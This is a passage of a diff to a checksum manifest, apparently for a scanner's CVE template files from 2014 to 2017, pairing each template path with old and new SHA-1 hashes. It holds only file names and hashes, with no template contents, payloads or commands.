+http/cves/2014/CVE-2014-10037.yaml:870d6eec8d024fb7143d69a360d579b78d3a2103 +http/cves/2014/CVE-2014-1203.yaml:823c336191844f20566697875a1e64e6fcbbc66a +http/cves/2014/CVE-2014-2321.yaml:70ea337d41737fccf16072c8c7ca265eaf63fcd0 http/cves/2014/CVE-2014-2323.yaml:7ce4f365127b2d56d93bd00621fe7f66cb75d920 -http/cves/2014/CVE-2014-2383.yaml:87a73951b8469b91fb5752e9b3c33ef6f0eeed1b -http/cves/2014/CVE-2014-2908.yaml:4c14990a34b22ed347f4e245188fc50a594c829f -http/cves/2014/CVE-2014-2962.yaml:4b158e638c8ef78e5a7451033acc7dc3e24c0937 -http/cves/2014/CVE-2014-3120.yaml:c7eeda62732d65d0d2294048186fbeacda7fbf75 -http/cves/2014/CVE-2014-3206.yaml:598f1630ca850c0ae215b5a3938aab21d4e5e3d6 +http/cves/2014/CVE-2014-2383.yaml:e6fc065c26077bbaa1da092742dcbfc2433cbb17 +http/cves/2014/CVE-2014-2908.yaml:23bd4300dbcf41a52e228bd76670fd0072f29589 +http/cves/2014/CVE-2014-2962.yaml:f0b19e507060a28dfecaa057a044859b51c55165 +http/cves/2014/CVE-2014-3120.yaml:ffac0398c9bd438dd40a5267cce63f56dbb47dd8 +http/cves/2014/CVE-2014-3206.yaml:c256e8fc819159303014d0e32e244bfe0ba19368 http/cves/2014/CVE-2014-3704.yaml:d71b56809f076a074a9b5cb0499714902d43dd48 -http/cves/2014/CVE-2014-3744.yaml:6f344241e5c7a6943b5e37183446c93e6635a7b1 -http/cves/2014/CVE-2014-4210.yaml:3b937a13f073657b9d4c4e485b5ad17f31c9ab45 -http/cves/2014/CVE-2014-4513.yaml:780c35cb8dfcc8c9679b6fd3362ff84fa3044a55 -http/cves/2014/CVE-2014-4535.yaml:7496af5a800393fc233d1e4f207858b9c6c99523 -http/cves/2014/CVE-2014-4536.yaml:b60b503f2a2593d159fd712cce34372dfd5ada95 -http/cves/2014/CVE-2014-4539.yaml:0e425bddbb8d6cfebb83bb10f4dc798ba75c9db3 -http/cves/2014/CVE-2014-4544.yaml:63bc5c60c5e143061ae2b759c4a9f173ab7e6580 -http/cves/2014/CVE-2014-4550.yaml:c80e18aa4da04e39e40370f94621183e7d908430 -http/cves/2014/CVE-2014-4558.yaml:eef96ab60d179afe78eb0a915c7a28b807d0cee7 -http/cves/2014/CVE-2014-4561.yaml:3158d7fad94ca3ebae2c2fab6d2395229e919939 -http/cves/2014/CVE-2014-4592.yaml:87f231001e71f7afa004dc214895e2194f4feb4b -http/cves/2014/CVE-2014-4940.yaml:0146e71b949191ee61d863ae10e853a579354f51 -http/cves/2014/CVE-2014-4942.yaml:e00e9cce19ebb08dc736b2eb0a1d1a9eaac32129 -http/cves/2014/CVE-2014-5111.yaml:9d0a0ed76432be14d6fba1d5818f4c4fd7f6262e -http/cves/2014/CVE-2014-5258.yaml:27016c73b93f516cc11767eec1981103509abb2a -http/cves/2014/CVE-2014-5368.yaml:6bc91543fada9221dbd2d793cf63f50ea0e9f51e +http/cves/2014/CVE-2014-3744.yaml:9294a192b6be8fb7761d8f08d607eac3c6776286 +http/cves/2014/CVE-2014-4210.yaml:eae329e157e1cb46e088c8c93f8048907f8a9dbc +http/cves/2014/CVE-2014-4513.yaml:9420a793b0da39d6b2f3632e0d974e74cb9d02a9 +http/cves/2014/CVE-2014-4535.yaml:ed185b6b4cecc89ddb24270d8887f4dd7ad14628 +http/cves/2014/CVE-2014-4536.yaml:c16ef0a77cf9d9f43ec3c06024cf2bb5e3461d14 +http/cves/2014/CVE-2014-4539.yaml:68ab098aeb40650efee9954fe265de0bafbea554 +http/cves/2014/CVE-2014-4544.yaml:c5552a3ac7cbd1856b4c2888daab83a04be311e8 +http/cves/2014/CVE-2014-4550.yaml:0fff504a61e85614493172afacb34ee6a8270b5e +http/cves/2014/CVE-2014-4558.yaml:eececb2a9c57b203236250c9d92a2f31ed72ef1c +http/cves/2014/CVE-2014-4561.yaml:b6b791e12ccc5c6f6cba8b504b20adf0a4b5f689 +http/cves/2014/CVE-2014-4592.yaml:f42c67af879558613a93676a9284c3b5c29361b3 +http/cves/2014/CVE-2014-4940.yaml:036ab9b80130d8e0a94617b05e626593d4536648 +http/cves/2014/CVE-2014-4942.yaml:4939facee67d4b71a3ab32ebc9d5ecd517001a44 +http/cves/2014/CVE-2014-5111.yaml:680083f6588d8fd90442b70b20d215416058a9c9 +http/cves/2014/CVE-2014-5258.yaml:c9b9901d9ce95b493e6040e85c6cbc56e8f2b5fb +http/cves/2014/CVE-2014-5368.yaml:ff9215b872aa23b150f7e96dba45d0c5d5f5579c http/cves/2014/CVE-2014-6271.yaml:1e66aea403b8845fc9a535c27a7a1d9f13fd3e75 http/cves/2014/CVE-2014-6287.yaml:77f152601c5b8b99baba6f5d70ffb407424e1fcc -http/cves/2014/CVE-2014-6308.yaml:87098094a5ca0e280f5ae2c01e01e7ec9b2593f2 -http/cves/2014/CVE-2014-8676.yaml:785236d75ecbfc8e1f6cedd047aad9ad781bb966 -http/cves/2014/CVE-2014-8682.yaml:0a6730fe36e7b0f29822ed4b5bc6d7ae0330c478 -http/cves/2014/CVE-2014-8799.yaml:760f49c92ab588bc64c740558d6bddfc75482fb7 -http/cves/2014/CVE-2014-9094.yaml:d0b8375704f1386dbd0dd4530333a1a72f7d5de8 -http/cves/2014/CVE-2014-9119.yaml:3de9aef9f206b4bf6fb067d120bae9462ef92bcc -http/cves/2014/CVE-2014-9180.yaml:c66ae7e191dfc3f3615d6a83528979e27adeceeb -http/cves/2014/CVE-2014-9444.yaml:9cf13a80525c5423abbcd822a030c9cb28d67996 -http/cves/2014/CVE-2014-9606.yaml:dfb8688c698cd62f735c46bfb751c4e7cf2c1513 -http/cves/2014/CVE-2014-9607.yaml:3adeb3d20d6f5034de6202ebf201aea085fdb81c -http/cves/2014/CVE-2014-9608.yaml:1c176248e83b25620eb9e0eb668240b344c7412b -http/cves/2014/CVE-2014-9609.yaml:2a76a7d5341a58c4e53bab7b367e96eee2310a49 -http/cves/2014/CVE-2014-9614.yaml:2fb3d5a885e3253aa2e2a1e9d9558214bc79abf7 -http/cves/2014/CVE-2014-9615.yaml:1cc5fe58698acffe2875354dc8e17b954ff23fd9 -http/cves/2014/CVE-2014-9617.yaml:f1da0676d2230da781524710959e4c4a917c0e8b -http/cves/2014/CVE-2014-9618.yaml:62ddb15b7835547969f46c78ff9d73b9d6578fe4 -http/cves/2015/CVE-2015-0554.yaml:a99092548ae986d68e27cbec10bda5c4d1cce709 -http/cves/2015/CVE-2015-1000005.yaml:c2d62176415b5313bfc7267749142cfa9c039290 -http/cves/2015/CVE-2015-1000010.yaml:5db8d1ea5a4b482ce606cedf13b16eac1d6741ed -http/cves/2015/CVE-2015-1000012.yaml:a338ecdc6b60bfe0f731c788cae55c490abd4556 -http/cves/2015/CVE-2015-1427.yaml:fb908e417d932cdebed01f210993e4a83b37974e -http/cves/2015/CVE-2015-1503.yaml:6fd710358d5baa904f07d5bff1eea3f18f23766c -http/cves/2015/CVE-2015-1579.yaml:3bd9937b0417dedfef6a4cdbc3f0162b3f934dd0 -http/cves/2015/CVE-2015-1880.yaml:865d28bacc9f8ac11b734ecee51f3a55b292eb24 +http/cves/2014/CVE-2014-6308.yaml:ee16ae1a687cbb904b5eec980f44967ec36f2686 +http/cves/2014/CVE-2014-8676.yaml:f96e243256180db9daedaddc2258914c0f6dc90e +http/cves/2014/CVE-2014-8682.yaml:be5740a53e079e1fabbd2af7cc0929994e82f5e8 +http/cves/2014/CVE-2014-8799.yaml:2068b3facd7987706416a949002cdeab69d7ff0b +http/cves/2014/CVE-2014-9094.yaml:db60f6c800ff6ccbb97491f54d58d278f6e14e95 +http/cves/2014/CVE-2014-9119.yaml:04016b43bae0f87fea29bebe86cfdbdd3ef4cd74 +http/cves/2014/CVE-2014-9180.yaml:e0508e1f256b4550b94009ec754733468e98a7d7 +http/cves/2014/CVE-2014-9444.yaml:8d4a11cd4e1df4e2a47ef519ad7271da0806168a +http/cves/2014/CVE-2014-9606.yaml:73202110c0cf9e6f5cb6d91f29a8b184d83874e5 +http/cves/2014/CVE-2014-9607.yaml:a3facb5b783cf410e200ef36ca128817c53f8315 +http/cves/2014/CVE-2014-9608.yaml:8024eed69643b142c94966b42be8989884c86a80 +http/cves/2014/CVE-2014-9609.yaml:19b7542f09671d514f9b3ebc9f565fbc4f3aa9ad +http/cves/2014/CVE-2014-9614.yaml:d7cbfd112d26149574fc5ba69368436f731f8b30 +http/cves/2014/CVE-2014-9615.yaml:f6e31d8bd6454c0b94c48cbfdf9770cb62529c1e +http/cves/2014/CVE-2014-9617.yaml:c3e54564674ada7e8d7db6ec0e27ee17c7c206ff +http/cves/2014/CVE-2014-9618.yaml:3fab9e27c58226ba19cc2b1ae91ce071026d4ae5 +http/cves/2015/CVE-2015-0554.yaml:064fc452bca322086aff5ed45a1912cdcb6bb0dc +http/cves/2015/CVE-2015-1000005.yaml:4b9140b90bca1484dfdfbece7e6df51c81e1ac47 +http/cves/2015/CVE-2015-1000010.yaml:9a5fcdc15cb3aeefcdaf499419bf0c7eaaca2f7e +http/cves/2015/CVE-2015-1000012.yaml:94594847f675f50d96d7855f461c0a2fc26386d7 +http/cves/2015/CVE-2015-1427.yaml:d857a633558aadde444880b8324f4be543bbab20 +http/cves/2015/CVE-2015-1503.yaml:eaf3c9b9435ad4c365f98773c6f2a06bb3112e85 +http/cves/2015/CVE-2015-1579.yaml:7651b35a5b8e167acb750082f1207aae3c77b04a +http/cves/2015/CVE-2015-1880.yaml:b80a16ed6a9dbc88985822ff8a50d6caaa947f08 http/cves/2015/CVE-2015-20067.yaml:785c1c2db6a4483739645939a7ba573a05503406 -http/cves/2015/CVE-2015-2067.yaml:e01565947d393b441659eeae8722951943989169 -http/cves/2015/CVE-2015-2068.yaml:e938ccf765f9c981d0cd95094231be016bb9466b -http/cves/2015/CVE-2015-2080.yaml:46db2627b71bc23c979a3deb2b6eaacac2171022 -http/cves/2015/CVE-2015-2166.yaml:e3d2d1f270e2ec53f752b406f5bb86218000e062 -http/cves/2015/CVE-2015-2196.yaml:26b0035e894cca6092d1284bdcf95fb6dca63cc2 -http/cves/2015/CVE-2015-2755.yaml:160a5a31a2e63cd9c80ce02b99aa71affd3e4aba -http/cves/2015/CVE-2015-2807.yaml:f6cf7564ce08917cf60daa7dc8d460916f02fa67 -http/cves/2015/CVE-2015-2863.yaml:5a550ba0fa20e43adfb8360c1a794c2b8a8fd713 -http/cves/2015/CVE-2015-2996.yaml:c66d9fbc33aec55fb85feee505bb87583464f25c -http/cves/2015/CVE-2015-3035.yaml:2dfc456642d767e62f2a27c46f32c0a8eb5558d1 -http/cves/2015/CVE-2015-3224.yaml:35869f5b7edc67f5c19ad9f7e17fbcccd5f7b112 -http/cves/2015/CVE-2015-3337.yaml:61475593cc9f49867f02914a66eeeb04e50a6a20 -http/cves/2015/CVE-2015-3648.yaml:f461d0d47e83bedbf44e72bb5dd5ee58d13b9bbf -http/cves/2015/CVE-2015-3897.yaml:d192e65ceef11e843f82f52eb1af42c4e7ee03b3 -http/cves/2015/CVE-2015-4050.yaml:a53fd92e4159025ff932e82df531aecc5a1883fb -http/cves/2015/CVE-2015-4062.yaml:ad395c5faa5c0ac7f44b1763aefddbca78ac9a55 -http/cves/2015/CVE-2015-4063.yaml:9f36c1385386234f59c6c9d258a5640f9c0c64e6 -http/cves/2015/CVE-2015-4074.yaml:ee94584f28a68cb216d37c90ce170f5f36048819 -http/cves/2015/CVE-2015-4127.yaml:2c119fb6e4b02129c34e6ae328b6684e5292c397 -http/cves/2015/CVE-2015-4414.yaml:c2644e1e551a8a60b3a82be98695a52231551e9a -http/cves/2015/CVE-2015-4632.yaml:35d5690720d1b857cea514716050e47e41a0c6e3 -http/cves/2015/CVE-2015-4666.yaml:8887ee23b3bf023d17387f5709cfd56666fe7f0c -http/cves/2015/CVE-2015-4668.yaml:e649d74b29d89b7dc081ed5d5b601ef5bc045d6d -http/cves/2015/CVE-2015-4694.yaml:05bee5bf6bea46dfa09271e421ada716419120a8 -http/cves/2015/CVE-2015-5354.yaml:7e67d26d2fee5967641f135d33f99b7f9a43454a -http/cves/2015/CVE-2015-5461.yaml:a187d67670e6a8467c24fd37ac446b3f88c4ea0c -http/cves/2015/CVE-2015-5469.yaml:1d21bb150e5413ebc3535c744d320adb6c144cdc -http/cves/2015/CVE-2015-5471.yaml:e954db90df779c64bd46fed487de139ca9d90069 -http/cves/2015/CVE-2015-5531.yaml:6ccd4a8b45228083ec7ed0e657b55bef5e7d74dd -http/cves/2015/CVE-2015-5688.yaml:1e67a92d9177f35493b4a9447e338a605cc28431 -http/cves/2015/CVE-2015-6477.yaml:3d76289c74bf27801577d680856b9ffd242bc163 -http/cves/2015/CVE-2015-6544.yaml:d0f09280dc71dfc33989fc21358e792ad8cbcaf1 -http/cves/2015/CVE-2015-6920.yaml:05e9263fe6eae73bd5b0f0bad05ad4b3f8319ac2 -http/cves/2015/CVE-2015-7245.yaml:0e78509b6f335cec4149135028b4dd5a085bb74f +http/cves/2015/CVE-2015-2067.yaml:79606d10c30ca5f00af1def780359abc8368d79e +http/cves/2015/CVE-2015-2068.yaml:f6153efb18f72b59deb74d55f3faba4e3bdd06f7 +http/cves/2015/CVE-2015-2080.yaml:75bbab2d13a2ba2aa45244165507742795998a3e +http/cves/2015/CVE-2015-2166.yaml:c67a1ae54c56a37138204604cddde7c022545318 +http/cves/2015/CVE-2015-2196.yaml:8be6b88a2adf6578d90bc1b244f133741913e088 +http/cves/2015/CVE-2015-2755.yaml:8a7129a03c0465d5d4d6db0f2b4de9fbcbaeb229 +http/cves/2015/CVE-2015-2807.yaml:a27ce790a54410b58bca2d107f4770d71c4335c9 +http/cves/2015/CVE-2015-2863.yaml:8ea8bfb3e60636ad8a0c831529b8db7bb248e1bf +http/cves/2015/CVE-2015-2996.yaml:b5a497197adcfc26430a0013932575c98bde741f +http/cves/2015/CVE-2015-3035.yaml:33b6b6830ee48590312cf997b1566849fb820d94 +http/cves/2015/CVE-2015-3224.yaml:6c504b7e2f180c261dbd66fb36c6834bf5ee83e4 +http/cves/2015/CVE-2015-3337.yaml:c52173ddb2ada82645952cac118ee2c745fc1e7b +http/cves/2015/CVE-2015-3648.yaml:a12670f01ebd18745b055b57a72860850fb497c9 +http/cves/2015/CVE-2015-3897.yaml:29f841f348bb2ee965ecf4bcf0cfa338fa025113 +http/cves/2015/CVE-2015-4050.yaml:1d328dd052a6ffd8439c2a12cf0cdac0877f7a67 +http/cves/2015/CVE-2015-4062.yaml:2d6677a353892252edc97535a0fe8f4584489e21 +http/cves/2015/CVE-2015-4063.yaml:1d3afdf64a24d4f7dbe2c8f78caeb5815eddfc62 +http/cves/2015/CVE-2015-4074.yaml:186e6adb639de8786c1e7f804a30565188b61650 +http/cves/2015/CVE-2015-4127.yaml:3014ef5a18b6a4284f6ebada680e860d4cd2be68 +http/cves/2015/CVE-2015-4414.yaml:4404e4bb147a0a94b5f5ec608eb6cb2d8a0741a0 +http/cves/2015/CVE-2015-4632.yaml:b94785422d9ec72c406cda604cac418467c16694 +http/cves/2015/CVE-2015-4666.yaml:8f1467571f8b5549977e1b50fcf8c67778ef4780 +http/cves/2015/CVE-2015-4668.yaml:dfd2cf69a4caa9a539b64cdadb124649a9124408 +http/cves/2015/CVE-2015-4694.yaml:6e519efee691097a489d5832398ee04af5e16771 +http/cves/2015/CVE-2015-5354.yaml:bb7d06578036a09e7353681bc86a37ef32eaf2ff +http/cves/2015/CVE-2015-5461.yaml:b9c1b5405b76204b5c2fd555e2b82da9fec8bcf8 +http/cves/2015/CVE-2015-5469.yaml:185190b779e332274b9870b5acccaf0f95a22d35 +http/cves/2015/CVE-2015-5471.yaml:9b4f375e831b43211a9a7f851f089d771da08ec2 +http/cves/2015/CVE-2015-5531.yaml:b4ae034f1b9bde1a4e68a4ae58daf88be99371c7 +http/cves/2015/CVE-2015-5688.yaml:847ea07613f104f2119941429fb2073f3987c086 +http/cves/2015/CVE-2015-6477.yaml:a347cb60fbce9d46465f6fdbb124c4e21cbe3706 +http/cves/2015/CVE-2015-6544.yaml:c43a67d85a5debaabe3dec744244adf0456faedf +http/cves/2015/CVE-2015-6920.yaml:4357cb17793b3b7d57dfe85edcbfb57fad5478ce +http/cves/2015/CVE-2015-7245.yaml:89bea5f3d1e7fce74a215f81a439ecf2f3ccd0bf http/cves/2015/CVE-2015-7297.yaml:ee6ffdbb3ecf6708fdf76decf78db3961954b8b8 -http/cves/2015/CVE-2015-7377.yaml:c11fcd8176d8be5c9a688635ef71f0dba4ea8f4c -http/cves/2015/CVE-2015-7450.yaml:c65f3b206e93a8955d90e7c3ef073944b344c3f7 -http/cves/2015/CVE-2015-7780.yaml:8a7620345540dafbdf35904cb2133f17dd8ace62 -http/cves/2015/CVE-2015-7823.yaml:672be578dc6fc5643d1c7339be855e43ca498518 -http/cves/2015/CVE-2015-8349.yaml:9e2b622f968334932bb0ab5bdf036f0d7f11b240 +http/cves/2015/CVE-2015-7377.yaml:bd6e1fea99c511fd2615d862a28a7c7ed9d95324 +http/cves/2015/CVE-2015-7450.yaml:905b9cdc3f19b9d7869778d1c2b23b2b8bdf8826 +http/cves/2015/CVE-2015-7780.yaml:2433a3a04dd58bf2c7a3243ce923edaa09c208c1 +http/cves/2015/CVE-2015-7823.yaml:8891123d768817ce22b517cfbf6d6d699c3e8450 +http/cves/2015/CVE-2015-8349.yaml:8416cf6432492314afbcc5912016a8f710a8eb8c http/cves/2015/CVE-2015-8399.yaml:0896a7dc49acb135939c804a7f45c05a62bb6ce5 -http/cves/2015/CVE-2015-8813.yaml:ceae0adfa5c392b45448921f93347b1ee8478a27 -http/cves/2015/CVE-2015-9312.yaml:aa27abbc41791c19e33090aab544131a29e66d0d -http/cves/2015/CVE-2015-9323.yaml:0bd77bec41e37be846d4a80587eed274d337d39c -http/cves/2015/CVE-2015-9414.yaml:b5f55e36bc3a495548181860907cb6fc64478ff9 -http/cves/2015/CVE-2015-9480.yaml:eb658afac2b1adfd98eee23fb4d04a8242193da0 -http/cves/2016/CVE-2016-0957.yaml:83181fc537f651fceaa3b9f53396b72730f75160 -http/cves/2016/CVE-2016-1000126.yaml:6a1a3621a931c5a078606cb0beff2124d7fa7bcd -http/cves/2016/CVE-2016-1000127.yaml:b1bb3844e2b9de15bc1e923d8f875260b1cca1b5 -http/cves/2016/CVE-2016-1000128.yaml:be3d1f502b6c1aa14a2d93e35a84549675428744 -http/cves/2016/CVE-2016-1000129.yaml:c0506bcd78e6f58028d39be6b2f668ab600a9b41 -http/cves/2016/CVE-2016-1000130.yaml:ff5f9d5ee2d947b74873812c3b090c4f3bbd52d3 -http/cves/2016/CVE-2016-1000131.yaml:d9ef2aea8303de31c7217fd542a0ae05be51955f -http/cves/2016/CVE-2016-1000132.yaml:1da7b63fb8627aaa305b36930265f048898ce16a -http/cves/2016/CVE-2016-1000133.yaml:70373b831880183a9198a9901a236838556360fc -http/cves/2016/CVE-2016-1000134.yaml:e136c7d30cedff03d69f3c91b1aa33c3355cdc24 -http/cves/2016/CVE-2016-1000135.yaml:e4d29daa7de1b663e3dbfefaf0a594d5cc681d9a -http/cves/2016/CVE-2016-1000136.yaml:fdf17cb09a08955f308f7b3951eedf0c07bfcb9e -http/cves/2016/CVE-2016-1000137.yaml:eb9987495e57a8f8b5f947fd134af03e9c432370 -http/cves/2016/CVE-2016-1000138.yaml:8ab6256ddb5372aca338e1d165c120606b78618d -http/cves/2016/CVE-2016-1000139.yaml:548e46b31149aaad9b7f14141019502a08fd1a37 -http/cves/2016/CVE-2016-1000140.yaml:01d135f5ef7e1e4c4a183a9398513192c90fdcf2 -http/cves/2016/CVE-2016-1000141.yaml:6187b07266363eae195e5bc191d034efc18d9759 -http/cves/2016/CVE-2016-1000142.yaml:1e9bbe6207381b489a476897e5e367cf82f0f92e -http/cves/2016/CVE-2016-1000143.yaml:c93167f7fd8b38dbf19f0c89885e1a96e787fbef -http/cves/2016/CVE-2016-1000146.yaml:3616b8c28fdceec8b304eebf0a0ffd6db5b29929 -http/cves/2016/CVE-2016-1000148.yaml:8f865433a566db152cccef2cd05790a77dadbb96 -http/cves/2016/CVE-2016-1000149.yaml:5b60eb9bc9dde9f6d61db65d4611a902d1edf940 -http/cves/2016/CVE-2016-1000152.yaml:7d3d58cd089900a12acf504f930c8b003d5aa74b -http/cves/2016/CVE-2016-1000153.yaml:07e6ba0b6770a4a941ed989604c817b2723b3e1b -http/cves/2016/CVE-2016-1000154.yaml:6576563b1f2e4298a9403362463753da499cb5f8 -http/cves/2016/CVE-2016-1000155.yaml:1a0e788af850b44003c270d32af6e287ff82a2e3 -http/cves/2016/CVE-2016-10033.yaml:ff427d6717b04469ca268756bf51005390fd2e7b -http/cves/2016/CVE-2016-10108.yaml:92705ffa239a4d76c02299908b37068952e1eba4 -http/cves/2016/CVE-2016-10134.yaml:76e2ff1a7cc4ae65c597fcd375eae5624768d7ec -http/cves/2016/CVE-2016-10367.yaml:88cdb2ee0b8d4df22df6c06f8d4a84180eb112c2 -http/cves/2016/CVE-2016-10368.yaml:c440eafde103763478b857aa4e37cbb0e9034b9b -http/cves/2016/CVE-2016-10924.yaml:35e02d984e8c7f19df3ad023f0948ff080fd0c55 -http/cves/2016/CVE-2016-10940.yaml:288d29f3e6b85bb632ab7be75a75c3ce426e708a -http/cves/2016/CVE-2016-10956.yaml:cba3f6ca0611ab4f36a541f9b9d79282f16df30f -http/cves/2016/CVE-2016-10960.yaml:8bd50b55ec2b325281b679041c7a855097fff054 -http/cves/2016/CVE-2016-10973.yaml:8ecabd66c818a7882d6341ef09241546b396d068 -http/cves/2016/CVE-2016-10993.yaml:2b06ff1b0f8a34b1ad225a8cd0de64d132fe5038 -http/cves/2016/CVE-2016-1555.yaml:1509639221fcb9083e2d8415958471ab148e0968 -http/cves/2016/CVE-2016-2389.yaml:e202a77bd825a6a311b45b9c7330ff2c4dc46fbd +http/cves/2015/CVE-2015-8813.yaml:bb2fe75af8a97b081fb3312036ffb81fbf2e25ea +http/cves/2015/CVE-2015-9312.yaml:775d33238623e1438f44f1eb0a565255f0b773f4 +http/cves/2015/CVE-2015-9323.yaml:224063ab5f46d0840d193360955a64b88ad5a739 +http/cves/2015/CVE-2015-9414.yaml:b754562edf298148491a77b11d92e6845d6d6ef3 +http/cves/2015/CVE-2015-9480.yaml:4ab1e42e8af68c0f579a7a84cf058a9759c8a7be +http/cves/2016/CVE-2016-0957.yaml:c752126907225333a4f314b93ed65a0ced09eb9e +http/cves/2016/CVE-2016-1000126.yaml:898322b70d44588b112833e15188e631b96fe9bd +http/cves/2016/CVE-2016-1000127.yaml:91f611e929ea50a579817f03f7d839208ba1345e +http/cves/2016/CVE-2016-1000128.yaml:4b257a3e8cc3f781f97268f6ab2eda1da0f69efa +http/cves/2016/CVE-2016-1000129.yaml:3e648b0c51d4f3a2daf8b8d6ecea93fbc2782ef9 +http/cves/2016/CVE-2016-1000130.yaml:dc5397c6eb5df23bc82b12289bba119d8fe9c825 +http/cves/2016/CVE-2016-1000131.yaml:a14fba69ffc9ad3a6158859ad898d5dfc0d0c1b9 +http/cves/2016/CVE-2016-1000132.yaml:68688b6915abe602cb2fff3d4446d00917836006 +http/cves/2016/CVE-2016-1000133.yaml:1e2b29c7463f9977c46cd0c03e6f7ff4f4947f04 +http/cves/2016/CVE-2016-1000134.yaml:50a9783e9ff32e66e346c67c4c99869d886d6ea5 +http/cves/2016/CVE-2016-1000135.yaml:a561993b9e7c546e1553a0536b778183e35c8da1 +http/cves/2016/CVE-2016-1000136.yaml:46e89bbaadb0b36f56824d3666d8c6f15554afe3 +http/cves/2016/CVE-2016-1000137.yaml:b2e0149b838f8662690666e95241410f85fc5197 +http/cves/2016/CVE-2016-1000138.yaml:3a9dffbf84584b1aa351843ffec83a900a0f1136 +http/cves/2016/CVE-2016-1000139.yaml:49c62a8871b6f19e8d23506f4e07a2b880d9d358 +http/cves/2016/CVE-2016-1000140.yaml:04feb3f8fc30355e6a32ddf909d926bdc7ea6f66 +http/cves/2016/CVE-2016-1000141.yaml:387b4289a0ea2a834fa80f625782ecbc53c32bb4 +http/cves/2016/CVE-2016-1000142.yaml:2ae84ad2782cce24c5518fbcae51a008db4f79a0 +http/cves/2016/CVE-2016-1000143.yaml:b175acde5d322daedfd4cd0c995463014fb299b2 +http/cves/2016/CVE-2016-1000146.yaml:887f3dd8756ec4ad63c875829bea55696bef8c4c +http/cves/2016/CVE-2016-1000148.yaml:938221b2f8bf3bf4e567861c0ad7b104ac1dc19b +http/cves/2016/CVE-2016-1000149.yaml:36923ce403c73d5387f0f9dc8ada48fee7c883bc +http/cves/2016/CVE-2016-1000152.yaml:69d66d82ac430a1d9cd041add8e182625f674369 +http/cves/2016/CVE-2016-1000153.yaml:3e1f37fb0dc56e4a1cc85504a9ce4b2e9c3b78de +http/cves/2016/CVE-2016-1000154.yaml:2eede86a4c21949ae4408427faaa28ea551cfbca +http/cves/2016/CVE-2016-1000155.yaml:bca122ca83f6eceb96338b8daad22872e98399da +http/cves/2016/CVE-2016-10033.yaml:1629f6583c60abfb03793a24c9c16a436027ceb0 +http/cves/2016/CVE-2016-10108.yaml:e324234009705dc64a2f9f4486fbd693ccbb7618 +http/cves/2016/CVE-2016-10134.yaml:882508e136dc9aa4f2ca2ee2a3aec850c7ac6c86 +http/cves/2016/CVE-2016-10367.yaml:2ffb8a2aede4f91fce2cd078a5240b9a020d6713 +http/cves/2016/CVE-2016-10368.yaml:3914d773661194926456b45c17111ef213c32af0 +http/cves/2016/CVE-2016-10924.yaml:74603215b7443a5926abe6096ec38847376e620d +http/cves/2016/CVE-2016-10940.yaml:7c906a44ae7bdd88d6aa5a02c530fccfe7088568 +http/cves/2016/CVE-2016-10956.yaml:c9f11dd7738a630227f8dab0bf7923d4b093dbd3 +http/cves/2016/CVE-2016-10960.yaml:67ae99dada51c5522fe1706682cb0521cbb2235b +http/cves/2016/CVE-2016-10973.yaml:2b26e0b400b3dbb4f5ab3c77b75032ca5ac2fb94 +http/cves/2016/CVE-2016-10993.yaml:26ce19d0747cf31dcd8794e91a6c004aac4be823 +http/cves/2016/CVE-2016-1555.yaml:7e372b79bcc3592ad5f2cc0f55732e62a046f339 +http/cves/2016/CVE-2016-2389.yaml:d1e22b8d79052376220f848516bc880e37f00ef0 http/cves/2016/CVE-2016-3081.yaml:a0cacaef1341e95df63b04a33f5d33663ee34c1f -http/cves/2016/CVE-2016-3088.yaml:3182e38ea7e6700847f06619d0335e20c487ddfd -http/cves/2016/CVE-2016-3978.yaml:a06104a2dcd9116a05336d36f111091f8c769d62 -http/cves/2016/CVE-2016-4437.yaml:53891086eb7ca7b004ead29f85f6c42cb81ae42e -http/cves/2016/CVE-2016-4975.yaml:9a101b7715ba19d54c0fb788120bd63ee2c44b9a -http/cves/2016/CVE-2016-4977.yaml:ae3e36a37f5e01f0b2b91ce024e25ea9f754674e -http/cves/2016/CVE-2016-5649.yaml:2300bde8d91c705d352935e0694f24888b5bc1a3 -http/cves/2016/CVE-2016-6195.yaml:0f475c62375ef5de41eb0d03762b331b61b78d00 -http/cves/2016/CVE-2016-6277.yaml:68df5acb8f8fe0537047e6513662207b859a6455 +http/cves/2016/CVE-2016-3088.yaml:8a332513b20fb9f53c6cb4ef832cb042a300c3cd +http/cves/2016/CVE-2016-3978.yaml:c993aa719327c56aaa4ebf337d733af81149ea35 +http/cves/2016/CVE-2016-4437.yaml:8592dbc793a0a10c369682d43dd9574dd52c05a6 +http/cves/2016/CVE-2016-4975.yaml:a16d073a4883d5b84b5497e9101c6faca8e0ca1c +http/cves/2016/CVE-2016-4977.yaml:5bc29383482baafb80ad26da79572f3fb5405117 +http/cves/2016/CVE-2016-5649.yaml:3040a4cc8ad3d85c484f86243b4cb70d80a59e77 +http/cves/2016/CVE-2016-6195.yaml:2046388eb1db15f86005c2dc9c1151760b5f0d88 +http/cves/2016/CVE-2016-6277.yaml:006711969c0899feca65bb306cc770d87aecc149 http/cves/2016/CVE-2016-6601.yaml:87a3cc98117de752e21b4bed5d478586387c27cf http/cves/2016/CVE-2016-7552.yaml:e98423ac7941ae1d06e2c488cab86141cef3fa36 -http/cves/2016/CVE-2016-7834.yaml:fda38ae2356b96a12c8a88d63c814a63f7888f87 -http/cves/2016/CVE-2016-7981.yaml:611a1f2447156b526a163da8df353ed6613f58ce -http/cves/2016/CVE-2016-8527.yaml:64b96be79f4964de10a5f0d584e870332c1ebb96 -http/cves/2017/CVE-2017-0929.yaml:65fd2ffa041e5eb9e66b70be3e83f5a693f6752e +http/cves/2016/CVE-2016-7834.yaml:a24e489bc5fc62b8f608234530c9085f6691804d +http/cves/2016/CVE-2016-7981.yaml:9e875b158ec46aeaa2f525e5cf7d85aeb373c96e +http/cves/2016/CVE-2016-8527.yaml:48cf19350d917a00a7471ec2184ecfdd757769f9 +http/cves/2017/CVE-2017-0929.yaml:78445f4ebcb9c4cd8db061f40a602a0c0dca5f45 http/cves/2017/CVE-2017-1000028.yaml:1d2ad80af3e686ae5c7e60e6bfa486c875926c5e -http/cves/2017/CVE-2017-1000029.yaml:e74d01bf0d584d7351fcd5664b9b2f88bf88b507 -http/cves/2017/CVE-2017-1000163.yaml:4ad179ccc22709ea70d692b6189e254eac1995ae -http/cves/2017/CVE-2017-1000170.yaml:a0d9affbdc0136c8d665a51080c5c2b6284cf6c9 -http/cves/2017/CVE-2017-1000486.yaml:27a8789f78fa41ba424c2c295f440970c0bfd587 -http/cves/2017/CVE-2017-10075.yaml:25541854ff175b5e0c2b0e8b5ecaf4ba4a9f4e64 